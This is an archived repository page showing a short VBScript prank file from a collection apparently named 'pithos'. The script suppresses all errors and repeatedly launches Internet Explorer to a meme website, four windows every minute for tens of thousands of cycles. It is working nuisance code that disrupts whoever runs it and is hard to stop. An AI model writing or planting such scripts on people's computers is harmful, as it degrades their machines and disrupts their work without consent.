archive
/
pithos
Archived
1
Fork 0
This repository has been archived on 2023-03-26. You can view files and clone it, but cannot push or open issues or pull requests.
pithos/Resources/Do you know about the bird ...

11 lines
273 B
Plaintext

' theorangeone.net/pithos
Dim objShell
Set objShell = WScript.CreateObject( "WScript.Shell" )
On error resume next
for i= 0 to 99999
for j= 0 to 3
objShell.run(""""C:\Program Files\Internet Explorer\iexplore.exe" www.aboutthebird.com""")
next
WScript.Sleep 60000
next